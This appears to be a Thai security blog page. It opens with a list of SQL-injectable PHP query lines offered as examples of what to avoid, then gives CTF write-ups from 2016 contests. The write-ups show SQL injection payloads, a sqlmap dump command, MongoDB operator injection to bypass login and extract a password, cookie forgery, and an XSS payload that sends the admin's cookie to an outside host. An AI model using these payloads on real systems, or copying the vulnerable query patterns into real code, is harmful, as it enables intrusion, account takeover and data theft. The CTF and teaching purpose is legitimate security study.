$strSQL = "SELECT * FROM tblmember WHERE Email = '".trim($_POST['Email'])."' ";  
$strSQL = "SELECT * FROM tblmember WHERE (FirstName LIKE '%".$_GET["txtKeyword"]."%' or Lastname LIKE '%".$_GET["txtKeyword"]."%' and Class='ผ่านการอนุมัติ') ";  
$sql_mem = "update member set fname ='$_POST[fname]',name ='$_POST[name]',birthday ='$_POST[birthday]',address ='$_POST[address]',road ='$_POST[road]',district ='$_POST[district]',city ='$_POST[city]',province ='$_POST[province]',country ='$_POST[country]',zipcode ='$_POST[zipcode]',phone ='$_POST[phone]',fax ='$_POST[fax]',mobile ='$_POST[mobile]',email ='$_POST[email]' where usermem = '$_POST[usermem]'";  
$sql = "update send_detail set open='1' where send_id='$_GET[send_id]' and user_id = $k ";  
$sql="select * from book , send ,send_detail , user , typebook where send_detail.user_id = $a and send_detail.send_id = send.send_id and send.book_id = book.book_id and send.user_id = user.user_id and book.typebook_id = typebook.typebook_id and send.send_id = '$_GET[send_id]' ";  
$sql="select * from user where user_name='$_POST[username]' and user_password='$_POST[password]'";  
$sql2="select * from admin where admin_name='$_POST[username]' and admin_password='$_POST[password]' ";  
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID"]."' ";  
$sql="INSERT INTO chat (name, texts)VALUES ('$_POST[name]','$_POST[mes]');";  
$strSQL = "SELECT * FROM accounts WHERE Username = '".trim($_POST['Username'])."' ";  
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."',  
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."', '$password')";  
$sqlTb = "SELECT * FROM treatment where date='$_POST[date]'";  
$sql1 ='SELECT * FROM member WHERE username = "'.$_POST['ulog'].'"';  
$sql ="SELECT member.*,profile.* FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE 1 AND member.IDstd = '".$_POST['searchID']."' ";  
//$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";  
if($mysql->query(" SELECT * FROM [tb_student] WHERE [idStudent] like '".$_POST['ids']."'") > 0 ){  
$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";  
$sql = "INSERT INTO students ('name', 'last_name') VALUES('" . $_POST['student_name'][$i] . "', '" . $_POST['student_last_name'][$i] . "')";  
$res = $mysqli->query("SELECT * FROM ven_rent WHERE id_van = ".$_GET['u']);  
$strSQL = "SELECT * from objective WHERE ob_quiz_id = ".$_POST["chkColor"][$i]."";  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' ";  
$strSQL = "INSERT INTO member (Username,Password,Name,Status) VALUES ('".$_POST["txtUsername"]."',  
$strSQL = "SELECT * FROM course WHERE Id_Course = '".$_GET["Id_Course"]."' ";  
$sql1="SELECT * FROM user WHERE username='".$_GET['username']."'";  
$sql = "select * from po where POID like '%{$_POST['POID']}%'";  
$query = "SELECT * FROM teacher WHERE (T_user='".$_POST["txtT_user"]."') AND (T_pw='".$_POST["txtT_pw"]."')";  
$test_query="SELECT * FROM login WHERE username = '".$_POST['form-username']."'";  
$strSQL = "SELECT * FROM subject WHERE subject = '".trim($_POST['txtsubject'])."' ";  
$strSQL = "INSERT INTO subject (subject,course_description) VALUES ('".$_POST["txtsubject"]."','".$_POST["txtcourse_description"]."')";  
$strSQL = "SELECT * FROM course INNER JOIN type_course ON course.type_cou_id=type_course.tp_cou_id WHERE cou_id = '".$_GET['cou_id']."' ";  
$strSQL = "SELECT * FROM po2016 WHERE Po_number = '".$_GET["Po_number"]."' ";  
$strSQL1 = " SELECT * FROM drb_product WHERE drb_pd_code = 'GL-ES-".$_POST["drb_pd_codeSE"]."' ";  
$strSQL2 = " SELECT * FROM drb_product_up WHERE drb_pd_codeT = '".$_POST["drb_pd_codeT"]."' ";  
} else { $strSQL = "SELECT * FROM city WHERE ProvinceID ='".$_GET["proid"]."' ORDER BY CityNameT ASC";  
} else { $strSQL = "SELECT * FROM district WHERE CityID ='".$_GET["ampid"]."' ORDER BY DistrictNameT ASC";  
$strSQL = "SELECT * FROM webboard  WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
$strSQL2 = "SELECT * FROM reply  WHERE QuestionID = '".$_GET["QuestionID"]."' order by  replyID desc";  
$sql='SELECT * FROM tbl_member WHERE user = "'.$_POST['username'].'"';  
$sql1="INSERT INTO tbl_member value ('','".$_POST['name']."','".$_POST['username']."','".$_POST['mail']."','".$_POST['tel']."')";  
$strSQL2 = "SELECT * FROM orders_detail WHERE OrderID = '".$_GET["OrderID"]."' ";  
$strSQL = "SELECT * FROM slideshow WHERE slide_title = '".$_GET["CusID"]."' ";  
$up_Leave = "UPDATE leave_leave SET  Quota_id='$_POST[Quota_id]',  
$strSQL = "SELECT * FROM data_course WHERE cou_id = '".$_GET['cou_id']."' ";  
$sql_select_playlista     = "select * from playlist where p_playlist_name = '".$_GET['pid']."'order by p_Order ";  
$strSQL = "SELECT * FROM quotas WHERE Quota_id = '".$_POST["Quota_id"]."' ";  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."'  
$sql="select * from question where subject_id='$_GET[subject_id]' ";  
$sql="select * from choice where question_id='$_GET[question_id]' ";  
$strSQL = "SELECT * FROM it_rep_form WHERE rep_no = '".$_GET["rep_no"]."' ";  
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' ";  
$strSQL = "SELECT hex(pic1) FROM 2016_mission WHERE mission_id = '".$_GET["mission_id"]."' ";  
$strSQL = "SELECT * FROM product WHERE (id_prd LIKE '%".$_GET["txtKeyword"]."%' or ProductName LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM customer WHERE displayname = '".trim($_POST['txtUsername'])."'  
$strSQL = "update customer set namecus=". "'". $_POST["name"] ."'". ",";  
$sql="select * from allotment_item where hotel_id='".$_REQUEST["id"]."' and status='1' order by no_id ";  
$sql2="SELECT * FROM joinus WHERE eventstypecode='".$_POST["eventstypecode"]."'";  
$sql1="SELECT * FROM joinus WHERE passport = '".$_POST["scan"]."'";  
$sq1 = INSERT INTO strengthkf(keyID, strID)  VALUES ('.$_POST['chkKey'][$key].','.$strID.'); //get keyI">   
$sq1 = "UPDATE strengthkf SET keyID = '".$_POST['chkKey'][$key]."'  
$strSQL = "SELECT * FROM member WHERE MemberID = '".$_POST["MemberID"]."' ";  
$strSQL = "UPDATE member SET Username = '".$_POST["Username"]."', Password = '".$_POST["Password"]."', Name_member = '".$_POST["Name_member"]."', Addr_member = '".$_POST["Addr_member"]."'  
$strSQL = "SELECT product_id, Qty FROM orders_detail where order_detail_id = ".($_REQUEST['order_detail_id'] * 1);  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["CustomerID"]."' ";  
$strSQL = "UPDATE customer SET Name_cus = '".$_POST["Name_cus"]."', Address = '".$_POST["Address"]."',  
$strSQL1 = "SELECT * FROM tb_memfamily WHERE mem_id = '".$_GET['mem_id']."' ";  
$strSQL = "SELECT * FROM product WHERE productno = '".$_GET["productno"]."'";  
$sql_insert="INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";  
INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";  
$sql = "select * from  diagnosis where di_opt1= '$_REQUEST[s1]' && di_opt2= '$_REQUEST[s2]'  && di_opt3= '$_REQUEST[s3]'  && di_opt4= '$_REQUEST[s4]'  ";  
$strSQL = "SELECT * FROM employee WHERE Department = '".$_POST["department"]."' "  
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message) VALUES ('".$_POST["txt_name"]."',  
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message,date) VALUES ('".$_POST["txt_name"]."',  
$strSQL = "INSERT INTO info (Name,Skul,Age) VALUES ('".$_POST["txt_name"]."',  
$sql="update tb_student set stu_name='$stu_name', address='$address', status='$status' where stu_id='{$_POST['txtid']}' ";  
$sql="select * from tb_student where stu_id='{$_GET['id']}' ";  
$sql="delete from tb_student where stu_id='{$_GET['id']}'";  
$sql="UPDATE  tb_student SET stu_name='$stu_name', address='$address', status='$status' where stu_id=".$_POST['txtid'];  
$strSQL = "INSERT INTO orders (datetime,name,address,payment,date,tel,mail) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."','".$_POST["payment"]."','".$_POST["date"]."','".$_POST["tel"]."','".$_POST["mail"]."') ";  
$sql = "SELECT * FROM menu WHERE menu_name  LIKE  ('".$_POST["search"]."')%";  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID'][$i]."', Name='".$_POST['ResourceName'][$i]."', RoleName='".$_POST['RoleName'][$i]."', Category='".$_POST['ResourceCategory'][$i]."', Email='".$_POST['ResourceEmail'][$i]."', TelNo='".$_POST['ResourceTelNo'][$i]."', ResourceDeparment='".$_POST['ResourceDepartment'][$i]."' where ppid ='$ide'";  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID'][$i]."',  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID$i']."',  
$strSQL2 = "INSERT INTO trans (datetime,name,address,date) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."' ,'".$_POST["date"]."') ";  
$strSQL = "SELECT * FROM vehicle_tb WHERE (1 AND serial = '".$_POST["sserial"]."' OR assetNumber = '".$_POST["assetNumber"]."') and assetNumber !='' ";  
$strSQL = "SELECT * FROM ordername WHERE id_order = '".$_GET["OrderID"]."' ";  
$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";  
50.$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";  
/*$strSQL = "INSERT INTO s_scroll (m_username,m_password,m_name ,m_lastname ,m_level) VALUES ('".$_POST["txtUsername"]."',  
$strSQL = "INSERT INTO s_scroll (s_name, s_text, s_color, s_bg, s_font, s_size, s_speed) VALUES ('".$_POST["T_Name"]."','".$_POST["T_Text"]."','".$_POST["T_Color"]."','".$_POST["T_BG"]."','".$_POST["T_Font"]."','".$_POST["size"]."','".$_POST["speed"]."')";  
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
if(!mysqli_query($objCon,"INSERT INTO reply (QuestionID,CreateDate,Details,Name) VALUES ('".$_GET["QuestionID"]."','".date("Y-m-d H:i:s")."','".$_POST["txtDetails"]."','".$_POST["txtName"]."') ")){  
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
$strSQL1 = "SELECT * FROM product WHERE ProductName LIKE('".$_GET["ProductName"]."')";  
$strSQL = "SELECT * FROM member WHERE PerId = '".trim($_POST['txtPerId'])."' ";  
$strSQL = "SELECT * FROM member WHERE DriveId = '".trim($_POST['txtDriveId'])."' ";  
$strSQL = "SELECT * FROM member WHERE Tel = '".trim($_POST['txtTel'])."' ";  
$strSQL = "SELECT * FROM member WHERE Email = '".trim($_POST['txtEmail'])."' ";  
$strSQL = "UPDATE customer SET Name = '".$_POST["txtName"]."'  
$strSQL = "SELECT * FROM addinform WHERE ID_Inform= '".$_GET["ID_Inform"]."' ";  
$strCHECK = "SELECT * FROM  checkstock WHERE shopcode = '".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'";  
$result = mysql_query("update product set qty = qty + '".$_POST["qty$i"]."' where ProductID = '".$_POST["productid$i"]."'");  
$resultms = mysql_query("update ms set actqty = actqty - '".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strCHECKms = "SELECT * FROM  ms WHERE shopcode = '".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'";  
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$_POST["toshop"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strSQL = "SELECT * FROM person WHERE Person_ID LIKE '%".$_GET["txtKeyword"]."%' ";  
$sql = "INSERT INTO durable_goods VALUES('$_POST[Dg_idtxt]',$Dg_Income,'$_POST[Dg_nametxt]' ,'$POST[Dg_Brandtxt]','$_POST[Dg_Typetxt]','$_POST[Dg_colourtxt]', '$_POST[Dg_Sizetxt]','$_POST[PriceToUnittxt]','$_POST[Dg_budgettxt]','$_POST[Notetxt]')";  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["lmName1"]."' ";  
$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";  
$sql_a = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";  
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]' ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id  ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id = '$_GET[Locationname_id]' ORDER BY Locationareaname_id";  
$sqlp = "INSERT INTO app_pro (appid, proname, mod, prore, probcp)VALUES('$id', '".$_POST['procname'][$i]."', '".$_POST['idmod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";  
$sqlp = "INSERT INTO app_pro (proname, mod, prore, probcp)VALUES( '".$_POST['proname'][$i]."', '".$_POST['mod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";  
$strsql = "INSERT INTO test (name)VALUES('".$_POST['test'][$i]."')";  
$sql = "SELECT fac_sci_name, category FROM facultysci WHERE sci_criteria <= '".$_POST['data1']."'";  
$dbname = "SELECT * FROM teacher WHERE (name LIKE '%".$_GET["search"]."%' or phone LIKE '%".$_GET["search"]."%' )";  
$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";  
Quote:$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";  

หากนำโค้ดในส่วนนี้ไปใช้งานกับเว็บแอพฯจริงๆ อาจทำให้ผู้ที่ไม่ประสงค์ดีหรือแฮกเกอร์เจาะระบบเข้ามาขโมยข้อมูลจากฐานข้อมูลออกไป หรือถึงขั้นยึดเครื่องที่ให้บริการเว็บแอพฯอยู่เลยก็เป็นไปได้ครับ สำหรับการป้องกัน/แก้ไขช่องโหว่ SQL Injection สามารถอ่านได้จาก OWASP: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

ไอเดีย + Regexp: https://github.com/laurent22/so-sql-injections
SQL Injection Prevention Cheat Sheet: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
ปล. เพื่อการศึกษาครับ

HITCON CTF 2016: Are you rich? (Web) Write-up

Descriptions:

Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed

Solution:

1. Access to website have 2 functions, Get our bitcoin address and Verify payment.

2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.

3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.

4. ' or 1=1# --- Found more than 1 records?

5. ' or 1=2# --- does not have enough confirmed money?

4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait a several minute to retrieve a flag.

In Burp Suite (Union Based)

Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

HITCON CTF 2016: %%% (Web) Write-up

Descriptions:

Although it is easy, but I still made this challenge because it is useful in penetration testing.
http://52.196.116.69/

Solution:

1. Access to the web,  Have an error about certificate.

2. View certificate.

3. very-secret-area-for-ctf.orange.tw, Try to modify hosts file.

52.196.116.69 very-secret-area-for-ctf.orange.tw

4. Access to very-secret-area-for-ctf.orange.tw and get a flag.

Flag: hitcon{hihihi, how 4re y0u today?}

MMA CTF 2nd 2016: Get the admin password! (Web) Write-up

Descriptions:

Get the admin password!
http://gap.chal.ctf.westerns.tokyo/

You can use test:test

Solution: 

1. Try to inject in user/password field such as SQL Injection it not show more information.

2. Fuzzing via BurpSuite Pro with Simple list: Fuzzing - SQL Injection by user=admin&password=[Fuzz]. and get some different length.

3. Using Google to search with keyword that we have and found the backend database is MongoDB

4. Try MongoDB Injection with user=admin&password[$ne]=1, and successfull to login as admin!

5. This challenge need a admin password, I try regex operator to guess a admin's password like user=admin&password[$regex]=^TWCTF{[Fuzz]

6. Set payload type Brute forcer with characte set in $ python -c "import string; print string.printable".

7. Set option Grep - Extract because if character is valid will return HTTP status code 302 Found to redirect to index page.

8. Start attack and found 1st character is "w" :)

9. Fuzzing to find another character of admin's password.

Flag: TWCTF{wasshoi!summer_festival!}

MMA CTF 2nd 2016: glance (Misc) Write-up

Descriptions:

I saw this through a gap of the door on a train.

Solution: 

1. Get a animation gif file and go to http://gifmaker.me/exploder/ for split gif to frame.

2. I want to concat all gif image and go to www.google.com, search and get some command that usefull. http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally

3. convert +append *.gif out.png

Flag: TWCTF{Bliss by Charles O'Rear}

TU CTF 2016: Duckprint (Web) Write-up

Descriptions:

See if you can steal the admin's duck print and validate it!

When calculating the SHA, leave the periods in

http://130.211.242.26:31337

Solution: 

1. This challenge have 3 pages (Register, Generate, Validate), The goal is calculate token and valid admin to get the flag.

2. Register with username "ichz"

3. Try to generate token from my user, and see my username, admin status = 0, token, generated token.

4. Generated token format is sha256(b64(username) + "." + b64(cookie) + "." + b64(token)), Where is admin username and admin token?

5. View source of Generate page and found comment that tell me a SQL query statement on line 24, Yes it vulnerable to SQL Injection!

6. Try to insert a simple ' or '1'='1'-- -, I get all registered user and one of Admin! (DuckDuckGoose), admin position = 1, token = d4rkw1ng

7. Go to Validate page, and get some notice that not have permission to access it, Cannot access.

8. In the cookies, I found duck_cookie is a JSON format and set to %7B%22username%22%3A%22ichz%22%2C%22admin%22%3A0%7D%0A, Try to change a cookie to %7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A by Web Developer Tool on Google Chrome and access this page again.

9. Back to generated token format is sha256(b64(username) + "." + b64(cookie) + "." + b64(token)), Finally done I get a username, token from SQL Injection vulnerability.

- sha256(b64('DuckDuckGoose') + "." + b64('%7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A') + "." + b64('d4rkw1ng'))

- sha256('RHVja0R1Y2tHb29zZQ==.JTdCJTIydXNlcm5hbWUlMjIlM0ElMjJEdWNrRHVja0dvb3NlJTIyJTJDJTIyYWRtaW4lMjIlM0ExJTdE.ZDRya3cxbmc=')

- sha256: 29fb251184e9eadb3eb7a1790ecd1dd945525b1f50b56b261e01d9e2429cbe8b

10. Access to Validate page and submit generated token to get a flag.

Flag: TUCTF{Quacky_McQuackerface}

TU CTF 2016: Student Grades (Web) Write-up

Descriptions:

We are trying to find out what our grade was, but we don't seem to be in the database...

Can you help us out?

http://104.199.151.39/index.html

Solution: 

1. "in the database..." on description make me sure, It about SQL Injection.

2. Index page have a input of name that want to show grade.

3. View source in index.html and get some script.

4. In line 46 is vulnerable to SQL Injection but in line 50 means the data will send with md5 to postQuery.php by ajax.

5. In Response tab, I found some comment that tell me a SQL query statement.

6. Write a python script to get data in each step, Found Database: tuctf, Tables: tuctf_grades, tuctf_info, tuctf_junk Columns: item, value and Flag store in tuctf_info.

7. select value from tuctf_info

Python Script:

Flag: TUCTF{v4ccinate_y0ur_databa5e5}

Internetwache CTF 2016: It's Prime Time! (Code) Write-up

Description:

We all know that prime numbers are quite important in cryptography. Can you help me to find some?

Solution: 


Flag: IW{Pr1m3s_4r3_!mp0rt4nt}

Internetwache CTF 2016: A numbers game (Code) Write-up

Description:

People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake.

Solution: 

Flag: IW{M4TH_1S_34SY}

Sharif CTF 2016: PhotoBlog (Web) Write-up

Description:

A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog

Solution:

1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to Cross-site Scripting (XSS)

2. Description tell me "want to login as admin", I custom JavaScript to steal a admin's cookie and put to comment.

<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' +  encodeURI(document.cookie);</script>

3. Wait a minute and give some cookie in my site's access log.

/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie

Flag: 1b7a60600d5731739c0e2115bd4ebf7c